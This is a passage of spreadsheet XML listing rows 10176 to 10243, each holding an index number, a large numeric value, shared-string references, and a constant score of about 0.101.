      <c r="C10176" s="2" t="s">
        <v>9735</v>
      </c>
      <c r="D10176" s="2">
        <v>1.0</v>
      </c>
      <c r="E10176" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10176" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="10177" ht="15.75" customHeight="1">
      <c r="A10177" s="1">
        <v>6376.0</v>
      </c>
      <c r="B10177" s="2">
        <v>4.840975E7</v>
      </c>
      <c r="C10177" s="2" t="s">
        <v>9736</v>
      </c>
      <c r="D10177" s="2">
        <v>1.0</v>
      </c>
      <c r="E10177" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10177" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="10178" ht="15.75" customHeight="1">
      <c r="A10178" s="1">
        <v>6572.0</v>
      </c>
      <c r="B10178" s="2">
        <v>4.8914493E7</v>
      </c>
      <c r="C10178" s="2" t="s">
        <v>9737</v>
      </c>
      <c r="D10178" s="2">
        <v>1.0</v>
      </c>
      <c r="E10178" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10178" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="10179" ht="15.75" customHeight="1">
      <c r="A10179" s="1">
        <v>6783.0</v>
      </c>
      <c r="B10179" s="2">
        <v>4.9483388E7</v>
      </c>
      <c r="C10179" s="2" t="s">
        <v>9738</v>
      </c>
      <c r="D10179" s="2">
        <v>1.0</v>
      </c>
      <c r="E10179" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10179" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="10180" ht="15.75" customHeight="1">
      <c r="A10180" s="1">
        <v>6837.0</v>
      </c>
      <c r="B10180" s="2">
        <v>4.9607346E7</v>
      </c>
      <c r="C10180" s="2" t="s">
        <v>9739</v>
      </c>
      <c r="D10180" s="2">
        <v>1.0</v>
      </c>
      <c r="E10180" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10180" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="10181" ht="15.75" customHeight="1">
      <c r="A10181" s="1">
        <v>7143.0</v>
      </c>
      <c r="B10181" s="2">
        <v>5.0457137E7</v>
      </c>
      <c r="C10181" s="2" t="s">
        <v>9740</v>
      </c>
      <c r="D10181" s="2">
        <v>1.0</v>
      </c>
      <c r="E10181" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10181" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="10182" ht="15.75" customHeight="1">
      <c r="A10182" s="1">
        <v>7314.0</v>
      </c>
      <c r="B10182" s="2">
        <v>5.0871088E7</v>
      </c>
      <c r="C10182" s="2" t="s">
        <v>9741</v>
      </c>
      <c r="D10182" s="2">
        <v>1.0</v>
      </c>
      <c r="E10182" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10182" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="10183" ht="15.75" customHeight="1">
      <c r="A10183" s="1">
        <v>7454.0</v>
      </c>
      <c r="B10183" s="2">
        <v>5.1235362E7</v>
      </c>
      <c r="C10183" s="2" t="s">
        <v>9742</v>
      </c>
      <c r="D10183" s="2">
        <v>1.0</v>
      </c>
      <c r="E10183" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10183" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="10184" ht="15.75" customHeight="1">
      <c r="A10184" s="1">
        <v>7505.0</v>
      </c>
      <c r="B10184" s="2">
        <v>5.139507E7</v>
      </c>
      <c r="C10184" s="2" t="s">
        <v>9743</v>
      </c>
      <c r="D10184" s="2">
        <v>1.0</v>
      </c>
      <c r="E10184" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10184" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="10185" ht="15.75" customHeight="1">
      <c r="A10185" s="1">
        <v>7552.0</v>
      </c>
      <c r="B10185" s="2">
        <v>5.152711E7</v>
      </c>
      <c r="C10185" s="2" t="s">
        <v>9744</v>
      </c>
      <c r="D10185" s="2">
        <v>1.0</v>
      </c>
      <c r="E10185" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10185" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="10186" ht="15.75" customHeight="1">
      <c r="A10186" s="1">
        <v>7610.0</v>
      </c>
      <c r="B10186" s="2">
        <v>5.166924E7</v>
      </c>
      <c r="C10186" s="2" t="s">
        <v>9745</v>
      </c>
      <c r="D10186" s="2">
        <v>1.0</v>
      </c>
      <c r="E10186" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10186" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="10187" ht="15.75" customHeight="1">
      <c r="A10187" s="1">
        <v>7686.0</v>
      </c>
      <c r="B10187" s="2">
        <v>5.1942858E7</v>
      </c>
      <c r="C10187" s="2" t="s">
        <v>9746</v>
      </c>
      <c r="D10187" s="2">
        <v>1.0</v>
      </c>
      <c r="E10187" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10187" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="10188" ht="15.75" customHeight="1">
      <c r="A10188" s="1">
        <v>7692.0</v>
      </c>
      <c r="B10188" s="2">
        <v>5.1954485E7</v>
      </c>
      <c r="C10188" s="2" t="s">
        <v>9747</v>
      </c>
      <c r="D10188" s="2">
        <v>1.0</v>
      </c>
      <c r="E10188" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10188" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="10189" ht="15.75" customHeight="1">
      <c r="A10189" s="1">
        <v>7740.0</v>
      </c>
      <c r="B10189" s="2">
        <v>5.2053004E7</v>
      </c>
      <c r="C10189" s="2" t="s">
        <v>9748</v>
      </c>
      <c r="D10189" s="2">
        <v>1.0</v>
      </c>
      <c r="E10189" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10189" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="10190" ht="15.75" customHeight="1">
      <c r="A10190" s="1">
        <v>7771.0</v>
      </c>
      <c r="B10190" s="2">
        <v>5.2130198E7</v>
      </c>
      <c r="C10190" s="2" t="s">
        <v>9749</v>
      </c>
      <c r="D10190" s="2">
        <v>1.0</v>
      </c>
      <c r="E10190" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10190" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="10191" ht="15.75" customHeight="1">
      <c r="A10191" s="1">
        <v>7808.0</v>
      </c>
      <c r="B10191" s="2">
        <v>5.223788E7</v>
      </c>
      <c r="C10191" s="2" t="s">
        <v>9750</v>
      </c>
      <c r="D10191" s="2">
        <v>1.0</v>
      </c>
      <c r="E10191" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10191" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="10192" ht="15.75" customHeight="1">
      <c r="A10192" s="1">
        <v>8179.0</v>
      </c>
      <c r="B10192" s="2">
        <v>5.3242641E7</v>
      </c>
      <c r="C10192" s="2" t="s">
        <v>9751</v>
      </c>
      <c r="D10192" s="2">
        <v>1.0</v>
      </c>
      <c r="E10192" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10192" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="10193" ht="15.75" customHeight="1">
      <c r="A10193" s="1">
        <v>8192.0</v>
      </c>
      <c r="B10193" s="2">
        <v>5.3252741E7</v>
      </c>
      <c r="C10193" s="2" t="s">
        <v>9752</v>
      </c>
      <c r="D10193" s="2">
        <v>1.0</v>
      </c>
      <c r="E10193" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10193" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="10194" ht="15.75" customHeight="1">
      <c r="A10194" s="1">
        <v>8334.0</v>
      </c>
      <c r="B10194" s="2">
        <v>5.368007E7</v>
      </c>
      <c r="C10194" s="2" t="s">
        <v>9753</v>
      </c>
      <c r="D10194" s="2">
        <v>1.0</v>
      </c>
      <c r="E10194" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10194" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="10195" ht="15.75" customHeight="1">
      <c r="A10195" s="1">
        <v>8357.0</v>
      </c>
      <c r="B10195" s="2">
        <v>5.375795E7</v>
      </c>
      <c r="C10195" s="2" t="s">
        <v>9754</v>
      </c>
      <c r="D10195" s="2">
        <v>1.0</v>
      </c>
      <c r="E10195" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10195" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="10196" ht="15.75" customHeight="1">
      <c r="A10196" s="1">
        <v>8602.0</v>
      </c>
      <c r="B10196" s="2">
        <v>5.4266808E7</v>
      </c>
      <c r="C10196" s="2" t="s">
        <v>9755</v>
      </c>
      <c r="D10196" s="2">
        <v>1.0</v>
      </c>
      <c r="E10196" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10196" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="10197" ht="15.75" customHeight="1">
      <c r="A10197" s="1">
        <v>9136.0</v>
      </c>
      <c r="B10197" s="2">
        <v>5.5240562E7</v>
      </c>
      <c r="C10197" s="2" t="s">
        <v>9756</v>
      </c>
      <c r="D10197" s="2">
        <v>1.0</v>
      </c>
      <c r="E10197" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10197" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="10198" ht="15.75" customHeight="1">
      <c r="A10198" s="1">
        <v>9342.0</v>
      </c>
      <c r="B10198" s="2">
        <v>5.5651697E7</v>
      </c>
      <c r="C10198" s="2" t="s">
        <v>9757</v>
      </c>
      <c r="D10198" s="2">
        <v>1.0</v>
      </c>
      <c r="E10198" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10198" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="10199" ht="15.75" customHeight="1">
      <c r="A10199" s="1">
        <v>9629.0</v>
      </c>
      <c r="B10199" s="2">
        <v>5.6224102E7</v>
      </c>
      <c r="C10199" s="2" t="s">
        <v>9758</v>
      </c>
      <c r="D10199" s="2">
        <v>1.0</v>
      </c>
      <c r="E10199" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10199" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="10200" ht="15.75" customHeight="1">
      <c r="A10200" s="1">
        <v>9754.0</v>
      </c>
      <c r="B10200" s="2">
        <v>5.6490156E7</v>
      </c>
      <c r="C10200" s="2" t="s">
        <v>9759</v>
      </c>
      <c r="D10200" s="2">
        <v>1.0</v>
      </c>
      <c r="E10200" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10200" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="10201" ht="15.75" customHeight="1">
      <c r="A10201" s="1">
        <v>9760.0</v>
      </c>
      <c r="B10201" s="2">
        <v>5.6493986E7</v>
      </c>
      <c r="C10201" s="2" t="s">
        <v>9760</v>
      </c>
      <c r="D10201" s="2">
        <v>1.0</v>
      </c>
      <c r="E10201" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10201" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="10202" ht="15.75" customHeight="1">
      <c r="A10202" s="1">
        <v>9784.0</v>
      </c>
      <c r="B10202" s="2">
        <v>5.6518536E7</v>
      </c>
      <c r="C10202" s="2" t="s">
        <v>9761</v>
      </c>
      <c r="D10202" s="2">
        <v>1.0</v>
      </c>
      <c r="E10202" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10202" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="10203" ht="15.75" customHeight="1">
      <c r="A10203" s="1">
        <v>9869.0</v>
      </c>
      <c r="B10203" s="2">
        <v>5.6729127E7</v>
      </c>
      <c r="C10203" s="2" t="s">
        <v>9762</v>
      </c>
      <c r="D10203" s="2">
        <v>1.0</v>
      </c>
      <c r="E10203" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10203" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="10204" ht="15.75" customHeight="1">
      <c r="A10204" s="1">
        <v>9870.0</v>
      </c>
      <c r="B10204" s="2">
        <v>5.6729127E7</v>
      </c>
      <c r="C10204" s="2" t="s">
        <v>9763</v>
      </c>
      <c r="D10204" s="2">
        <v>1.0</v>
      </c>
      <c r="E10204" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10204" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="10205" ht="15.75" customHeight="1">
      <c r="A10205" s="1">
        <v>10028.0</v>
      </c>
      <c r="B10205" s="2">
        <v>5.7055E7</v>
      </c>
      <c r="C10205" s="2" t="s">
        <v>9764</v>
      </c>
      <c r="D10205" s="2">
        <v>1.0</v>
      </c>
      <c r="E10205" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10205" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="10206" ht="15.75" customHeight="1">
      <c r="A10206" s="1">
        <v>10035.0</v>
      </c>
      <c r="B10206" s="2">
        <v>5.7060719E7</v>
      </c>
      <c r="C10206" s="2" t="s">
        <v>9765</v>
      </c>
      <c r="D10206" s="2">
        <v>1.0</v>
      </c>
      <c r="E10206" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10206" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="10207" ht="15.75" customHeight="1">
      <c r="A10207" s="1">
        <v>10383.0</v>
      </c>
      <c r="B10207" s="2">
        <v>8297441.0</v>
      </c>
      <c r="C10207" s="2" t="s">
        <v>9766</v>
      </c>
      <c r="D10207" s="2">
        <v>1.0</v>
      </c>
      <c r="E10207" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10207" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="10208" ht="15.75" customHeight="1">
      <c r="A10208" s="1">
        <v>10464.0</v>
      </c>
      <c r="B10208" s="2">
        <v>1.082302E7</v>
      </c>
      <c r="C10208" s="2" t="s">
        <v>9767</v>
      </c>
      <c r="D10208" s="2">
        <v>1.0</v>
      </c>
      <c r="E10208" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10208" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="10209" ht="15.75" customHeight="1">
      <c r="A10209" s="1">
        <v>10583.0</v>
      </c>
      <c r="B10209" s="2">
        <v>1.3184074E7</v>
      </c>
      <c r="C10209" s="2" t="s">
        <v>9768</v>
      </c>
      <c r="D10209" s="2">
        <v>1.0</v>
      </c>
      <c r="E10209" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10209" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="10210" ht="15.75" customHeight="1">
      <c r="A10210" s="1">
        <v>10746.0</v>
      </c>
      <c r="B10210" s="2">
        <v>1.5461694E7</v>
      </c>
      <c r="C10210" s="2" t="s">
        <v>9769</v>
      </c>
      <c r="D10210" s="2">
        <v>1.0</v>
      </c>
      <c r="E10210" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10210" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="10211" ht="15.75" customHeight="1">
      <c r="A10211" s="1">
        <v>10911.0</v>
      </c>
      <c r="B10211" s="2">
        <v>1.6681806E7</v>
      </c>
      <c r="C10211" s="2" t="s">
        <v>9770</v>
      </c>
      <c r="D10211" s="2">
        <v>1.0</v>
      </c>
      <c r="E10211" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10211" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="10212" ht="15.75" customHeight="1">
      <c r="A10212" s="1">
        <v>11016.0</v>
      </c>
      <c r="B10212" s="2">
        <v>1.780046E7</v>
      </c>
      <c r="C10212" s="2" t="s">
        <v>9771</v>
      </c>
      <c r="D10212" s="2">
        <v>1.0</v>
      </c>
      <c r="E10212" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10212" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="10213" ht="15.75" customHeight="1">
      <c r="A10213" s="1">
        <v>11038.0</v>
      </c>
      <c r="B10213" s="2">
        <v>1.8005595E7</v>
      </c>
      <c r="C10213" s="2" t="s">
        <v>9772</v>
      </c>
      <c r="D10213" s="2">
        <v>1.0</v>
      </c>
      <c r="E10213" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10213" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="10214" ht="15.75" customHeight="1">
      <c r="A10214" s="1">
        <v>11056.0</v>
      </c>
      <c r="B10214" s="2">
        <v>1.8177905E7</v>
      </c>
      <c r="C10214" s="2" t="s">
        <v>9773</v>
      </c>
      <c r="D10214" s="2">
        <v>1.0</v>
      </c>
      <c r="E10214" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10214" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="10215" ht="15.75" customHeight="1">
      <c r="A10215" s="1">
        <v>11084.0</v>
      </c>
      <c r="B10215" s="2">
        <v>1.8477466E7</v>
      </c>
      <c r="C10215" s="2" t="s">
        <v>9774</v>
      </c>
      <c r="D10215" s="2">
        <v>1.0</v>
      </c>
      <c r="E10215" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10215" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="10216" ht="15.75" customHeight="1">
      <c r="A10216" s="1">
        <v>11115.0</v>
      </c>
      <c r="B10216" s="2">
        <v>1.8850622E7</v>
      </c>
      <c r="C10216" s="2" t="s">
        <v>9775</v>
      </c>
      <c r="D10216" s="2">
        <v>1.0</v>
      </c>
      <c r="E10216" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10216" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="10217" ht="15.75" customHeight="1">
      <c r="A10217" s="1">
        <v>11122.0</v>
      </c>
      <c r="B10217" s="2">
        <v>1.8938773E7</v>
      </c>
      <c r="C10217" s="2" t="s">
        <v>9776</v>
      </c>
      <c r="D10217" s="2">
        <v>1.0</v>
      </c>
      <c r="E10217" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10217" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="10218" ht="15.75" customHeight="1">
      <c r="A10218" s="1">
        <v>11309.0</v>
      </c>
      <c r="B10218" s="2">
        <v>2.1020746E7</v>
      </c>
      <c r="C10218" s="2" t="s">
        <v>9777</v>
      </c>
      <c r="D10218" s="2">
        <v>1.0</v>
      </c>
      <c r="E10218" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10218" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="10219" ht="15.75" customHeight="1">
      <c r="A10219" s="1">
        <v>11586.0</v>
      </c>
      <c r="B10219" s="2">
        <v>2.2881036E7</v>
      </c>
      <c r="C10219" s="2" t="s">
        <v>9778</v>
      </c>
      <c r="D10219" s="2">
        <v>1.0</v>
      </c>
      <c r="E10219" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10219" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="10220" ht="15.75" customHeight="1">
      <c r="A10220" s="1">
        <v>11624.0</v>
      </c>
      <c r="B10220" s="2">
        <v>2.312284E7</v>
      </c>
      <c r="C10220" s="2" t="s">
        <v>9779</v>
      </c>
      <c r="D10220" s="2">
        <v>1.0</v>
      </c>
      <c r="E10220" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10220" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="10221" ht="15.75" customHeight="1">
      <c r="A10221" s="1">
        <v>11691.0</v>
      </c>
      <c r="B10221" s="2">
        <v>2.3458481E7</v>
      </c>
      <c r="C10221" s="2" t="s">
        <v>9780</v>
      </c>
      <c r="D10221" s="2">
        <v>1.0</v>
      </c>
      <c r="E10221" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10221" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="10222" ht="15.75" customHeight="1">
      <c r="A10222" s="1">
        <v>11725.0</v>
      </c>
      <c r="B10222" s="2">
        <v>2.3917017E7</v>
      </c>
      <c r="C10222" s="2" t="s">
        <v>9781</v>
      </c>
      <c r="D10222" s="2">
        <v>1.0</v>
      </c>
      <c r="E10222" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10222" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="10223" ht="15.75" customHeight="1">
      <c r="A10223" s="1">
        <v>11788.0</v>
      </c>
      <c r="B10223" s="2">
        <v>2.4353059E7</v>
      </c>
      <c r="C10223" s="2" t="s">
        <v>9782</v>
      </c>
      <c r="D10223" s="2">
        <v>1.0</v>
      </c>
      <c r="E10223" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10223" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="10224" ht="15.75" customHeight="1">
      <c r="A10224" s="1">
        <v>11982.0</v>
      </c>
      <c r="B10224" s="2">
        <v>2.5846449E7</v>
      </c>
      <c r="C10224" s="2" t="s">
        <v>9783</v>
      </c>
      <c r="D10224" s="2">
        <v>1.0</v>
      </c>
      <c r="E10224" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10224" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="10225" ht="15.75" customHeight="1">
      <c r="A10225" s="1">
        <v>12070.0</v>
      </c>
      <c r="B10225" s="2">
        <v>2.661134E7</v>
      </c>
      <c r="C10225" s="2" t="s">
        <v>9784</v>
      </c>
      <c r="D10225" s="2">
        <v>1.0</v>
      </c>
      <c r="E10225" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10225" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="10226" ht="15.75" customHeight="1">
      <c r="A10226" s="1">
        <v>12108.0</v>
      </c>
      <c r="B10226" s="2">
        <v>2.6853906E7</v>
      </c>
      <c r="C10226" s="2" t="s">
        <v>9785</v>
      </c>
      <c r="D10226" s="2">
        <v>1.0</v>
      </c>
      <c r="E10226" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10226" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="10227" ht="15.75" customHeight="1">
      <c r="A10227" s="1">
        <v>12170.0</v>
      </c>
      <c r="B10227" s="2">
        <v>2.7412762E7</v>
      </c>
      <c r="C10227" s="2" t="s">
        <v>9786</v>
      </c>
      <c r="D10227" s="2">
        <v>1.0</v>
      </c>
      <c r="E10227" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10227" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="10228" ht="15.75" customHeight="1">
      <c r="A10228" s="1">
        <v>12334.0</v>
      </c>
      <c r="B10228" s="2">
        <v>2.8569762E7</v>
      </c>
      <c r="C10228" s="2" t="s">
        <v>9787</v>
      </c>
      <c r="D10228" s="2">
        <v>1.0</v>
      </c>
      <c r="E10228" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10228" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="10229" ht="15.75" customHeight="1">
      <c r="A10229" s="1">
        <v>12410.0</v>
      </c>
      <c r="B10229" s="2">
        <v>2.9064663E7</v>
      </c>
      <c r="C10229" s="2" t="s">
        <v>9788</v>
      </c>
      <c r="D10229" s="2">
        <v>1.0</v>
      </c>
      <c r="E10229" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10229" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="10230" ht="15.75" customHeight="1">
      <c r="A10230" s="1">
        <v>12443.0</v>
      </c>
      <c r="B10230" s="2">
        <v>2.9290297E7</v>
      </c>
      <c r="C10230" s="2" t="s">
        <v>9789</v>
      </c>
      <c r="D10230" s="2">
        <v>1.0</v>
      </c>
      <c r="E10230" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10230" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="10231" ht="15.75" customHeight="1">
      <c r="A10231" s="1">
        <v>12468.0</v>
      </c>
      <c r="B10231" s="2">
        <v>2.9417153E7</v>
      </c>
      <c r="C10231" s="2" t="s">
        <v>9790</v>
      </c>
      <c r="D10231" s="2">
        <v>1.0</v>
      </c>
      <c r="E10231" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10231" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="10232" ht="15.75" customHeight="1">
      <c r="A10232" s="1">
        <v>12481.0</v>
      </c>
      <c r="B10232" s="2">
        <v>2.9499498E7</v>
      </c>
      <c r="C10232" s="2" t="s">
        <v>9791</v>
      </c>
      <c r="D10232" s="2">
        <v>1.0</v>
      </c>
      <c r="E10232" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10232" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="10233" ht="15.75" customHeight="1">
      <c r="A10233" s="1">
        <v>12516.0</v>
      </c>
      <c r="B10233" s="2">
        <v>2.9661146E7</v>
      </c>
      <c r="C10233" s="2" t="s">
        <v>9792</v>
      </c>
      <c r="D10233" s="2">
        <v>1.0</v>
      </c>
      <c r="E10233" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10233" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="10234" ht="15.75" customHeight="1">
      <c r="A10234" s="1">
        <v>12580.0</v>
      </c>
      <c r="B10234" s="2">
        <v>3.0017045E7</v>
      </c>
      <c r="C10234" s="2" t="s">
        <v>9793</v>
      </c>
      <c r="D10234" s="2">
        <v>1.0</v>
      </c>
      <c r="E10234" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10234" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="10235" ht="15.75" customHeight="1">
      <c r="A10235" s="1">
        <v>12828.0</v>
      </c>
      <c r="B10235" s="2">
        <v>3.1641343E7</v>
      </c>
      <c r="C10235" s="2" t="s">
        <v>9794</v>
      </c>
      <c r="D10235" s="2">
        <v>1.0</v>
      </c>
      <c r="E10235" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10235" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="10236" ht="15.75" customHeight="1">
      <c r="A10236" s="1">
        <v>12916.0</v>
      </c>
      <c r="B10236" s="2">
        <v>3.2242684E7</v>
      </c>
      <c r="C10236" s="2" t="s">
        <v>9795</v>
      </c>
      <c r="D10236" s="2">
        <v>1.0</v>
      </c>
      <c r="E10236" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10236" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="10237" ht="15.75" customHeight="1">
      <c r="A10237" s="1">
        <v>13098.0</v>
      </c>
      <c r="B10237" s="2">
        <v>3.3513275E7</v>
      </c>
      <c r="C10237" s="2" t="s">
        <v>9796</v>
      </c>
      <c r="D10237" s="2">
        <v>1.0</v>
      </c>
      <c r="E10237" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10237" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="10238" ht="15.75" customHeight="1">
      <c r="A10238" s="1">
        <v>13129.0</v>
      </c>
      <c r="B10238" s="2">
        <v>3.3658516E7</v>
      </c>
      <c r="C10238" s="2" t="s">
        <v>9797</v>
      </c>
      <c r="D10238" s="2">
        <v>1.0</v>
      </c>
      <c r="E10238" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10238" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="10239" ht="15.75" customHeight="1">
      <c r="A10239" s="1">
        <v>13157.0</v>
      </c>
      <c r="B10239" s="2">
        <v>3.3846275E7</v>
      </c>
      <c r="C10239" s="2" t="s">
        <v>9798</v>
      </c>
      <c r="D10239" s="2">
        <v>1.0</v>
      </c>
      <c r="E10239" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10239" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="10240" ht="15.75" customHeight="1">
      <c r="A10240" s="1">
        <v>13296.0</v>
      </c>
      <c r="B10240" s="2">
        <v>3.4480691E7</v>
      </c>
      <c r="C10240" s="2" t="s">
        <v>9799</v>
      </c>
      <c r="D10240" s="2">
        <v>1.0</v>
      </c>
      <c r="E10240" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10240" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="10241" ht="15.75" customHeight="1">
      <c r="A10241" s="1">
        <v>13308.0</v>
      </c>
      <c r="B10241" s="2">
        <v>3.4537687E7</v>
      </c>
      <c r="C10241" s="2" t="s">
        <v>9800</v>
      </c>
      <c r="D10241" s="2">
        <v>1.0</v>
      </c>
      <c r="E10241" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10241" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="10242" ht="15.75" customHeight="1">
      <c r="A10242" s="1">
        <v>13350.0</v>
      </c>
      <c r="B10242" s="2">
        <v>3.4711852E7</v>
      </c>
      <c r="C10242" s="2" t="s">
        <v>9801</v>
      </c>
      <c r="D10242" s="2">
        <v>1.0</v>
      </c>
      <c r="E10242" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10242" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="10243" ht="15.75" customHeight="1">
      <c r="A10243" s="1">
        <v>13534.0</v>
      </c>
      <c r="B10243" s="2">
        <v>3.5600933E7</v>
      </c>
